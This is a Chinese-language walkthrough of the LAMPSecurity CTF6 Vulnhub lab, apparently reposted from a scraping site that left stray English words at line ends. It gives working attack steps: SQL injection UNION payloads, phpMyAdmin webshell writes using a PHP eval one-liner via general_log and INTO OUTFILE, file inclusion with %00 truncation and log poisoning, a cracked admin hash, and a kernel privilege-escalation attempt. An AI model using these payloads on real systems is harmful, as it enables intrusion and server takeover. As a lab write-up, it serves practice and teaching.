LAMPSecurity: CTF6 Vulnhub Walkthrough

鏡像下載地址:php

https://www.vulnhub.com/entry/lampsecurity-ctf6,85/html

 

主機掃描:mysql

╰─ nmap -p- -sV -oA scan 10.10.202.130
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-21 08:57 CST
Nmap scan report for 10.10.202.130
Host is up (0.0029s latency).
Not shown: 65525 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
80/tcp open http Apache httpd 2.2.3 ((CentOS))
110/tcp open pop3 Dovecot pop3d
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Dovecot imapd
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
624/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
3306/tcp open mysql MySQL 5.0.45
MAC Address: 00:0C:29:62:3B:5A (VMware)linux

目錄掃描web

 

 

 

phpinfo 獲取物理路徑:/var/www/htmlsql

網站備份尋找敏感信息shell

 

 

phpmyadmin 登陸試試ssh

phpadmin 寫shelltcp

這裏簡單下複習下PHPadmin 拿shell的幾種思路:網站

1)志文件寫入一句話來獲取webshell
general.log變量是指是否啓動記錄日誌;而general log file指的是日誌文件的路徑,能夠看到general.log變量的狀態爲OFF,故咱們要修改成ON;general log file變量中的*.log的後綴咱們改成*php。拿完webshell記得要改回去喲。SQL語句進行修改

show global variables like "%log%"

set global general_log = "ON";
SET global general_log_file='/var/www/html/shell.php'
select "<?php eval($_POST['cmd']);?>"


2)利用插入一句話來提取webshell

show global variables like '%secure%';顯示是NULL值,這樣的狀況下咱們插入一句話是沒法插入的,須要咱們修改secure_file_priv=''爲空值才能插入一句話:

解釋一下:

secure_file_priv爲null 表示不容許導入導出;

secure_file_priv指定文件夾時,表示mysql的導入導出只能發生在指定的文件夾;

secure_file_priv沒有設置時,則表示沒有任何限制


select "<?php eval($_POST['cmd']);?>" into outfile '/var/www/html/hack.php'

 

這裏日誌文件沒有開啓,第一種方式無失效,第二種方式,標識沒有限制,能夠嘗試寫webshell

 

 

 

報錯,目錄沒權限,嘗試/tmp 目錄寫入沒有問題的,放棄。嘗試其餘辦法

主頁面發現SQL注入漏洞:

http://10.10.202.130/index.php?id=4 and true  #true

http://10.10.202.130/index.php?id=4 and false # false

http://10.10.202.130/index.php?id=4 order by 7 #true

http://10.10.202.130/index.php?id=4 order by 8 #false

10.10.202.130/index.php?id=4 union select 1,2,3,4,5,6,7 from user

 

 

 http://10.10.202.130/?id=4 +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5,6,7

SQLmap 獲取admin的密碼

admin         | 25e4ee4e9229397b6b17776bfceaf8e7 (adminpass) 

http://10.10.202.130/index.php?action=login

登陸沒發現長傳點之類的接口

繼續看看源代碼

login.php 發現文件包含漏洞

 

這裏後綴爲.tpl,這裏嘗試使用截斷%00或者%0A

http://10.10.202.130/actions/login.php?action=../../conf/config.ini%00

 

嘗試把一句話木馬,這裏有兩個思路:

1. 經過phpamdin 寫到tmp目錄,進行文件包含../../../../../../tmp/hack.php%00

 

 

 

2. 寫到日誌文件,進行包含進來../../logs/log.log%00 看看可否解析

<?php eval($_POST['cmd']);?>

 

 

 

http://10.10.202.130/actions/login.php?action=../../logs/log.log%00

 

 

提權操做

嘗試內核提權,幾個都不行

最後經過Google得知內核Kernel version is 2.6.18-92.el5 須要UDEV提權

cp /usr/share/exploitdb/exploits/linux/local/8478.sh ./

sed -i -e 's/\r$//' 8478.sh

 

 

沒法成功,嘗試了屢次,依舊,有可能跟環境有關係吧!

相關文章
相關標籤/搜索